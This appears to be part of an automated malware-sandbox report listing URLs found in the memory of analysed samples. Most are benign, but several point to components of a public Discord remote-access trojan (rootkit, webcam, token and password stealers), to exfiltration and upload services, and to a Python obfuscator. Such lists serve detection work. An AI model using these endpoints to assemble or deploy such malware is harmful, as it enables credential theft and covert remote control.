                                    http://google.com/based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://github.com/Blank-c/BlankOBFbased.exe, 00000011.00000003.1818177199.000002A15D8E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1818342182.000002A15DB8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1817815301.000002A15DD1E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1819459988.000002A15DB8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFbased.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          http://ocsp.sectigo.com0based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://www.python.org/download/releases/2.3/mro/.RuntimeBroker.exe, 00000007.00000003.1741045639.0000010D2F242000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1776664073.0000010D2F448000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1969519599.0000016BB3BF8000.00000004.00001000.00020000.00000000.sdmpfalse
                                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                http://gateway.discord.ggRuntimeBroker2.0.exe, 00000006.00000002.1984341660.00000222000B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://python.org/dev/peps/pep-0263/hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmpfalse
                                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://github.com/urllib3/urllib3/issues/2920based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://gateway.discord.gg/?v=9&encording=jsonXRuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://yahoo.com/based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://discord.com/api/v9/guilds/87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  http://cacerts.digicert.cohacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://html.spec.whatwg.org/multipage/based.exe, 00000011.00000003.2040687659.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1876089664.000002A15E000000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1991725190.000002A15E006000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15E002000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          https://www.rfc-editor.org/rfc/rfc8259#section-8.1based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://contoso.com/powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://gateway.discord.gg:443/?v=9&encording=jsonRuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://oneget.orgXpowershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://cacerts.digicert.coahacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688RuntimeBroker.exe, 00000007.00000002.1769750613.0000010D2EE3C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1933446910.0000016BB36FC000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://geolocation-db.com/json87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                    https://sectigo.com/CPS0based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://cacerts.digicert.coSRuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://go.micropowershell.exe, 00000001.00000002.1795294245.000001F5BD423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://ocsp.thawte.com0based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerRuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://json.orgbased.exe, 00000011.00000003.1831935901.000002A15D886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://httpbin.org/based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://www.python.org/dev/peps/pep-0205/RuntimeBroker.exe, 00000005.00000003.1724634863.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1788254823.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790570421.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1816671465.000002A15D8CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sbased.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://twitter.com/based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://discord.com/api/v9/channels/RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brbased.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://support.mozilla.org/products/firefoxbased.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syRuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://google.com/based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://www.google.com/maps/place/87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                  https://google.com/mail/based.exe, 00000011.00000003.1969462146.000002A15DB94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://file.io/87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                      https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://www.openssl.org/Hbased.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://google.com/mailbased.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://support.mozilla.orgbased.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyhacn.exe, 00000012.00000003.1828089329.0000016BB1AE9000.00000004.00000020.00020000.00000000.sdmpfalse
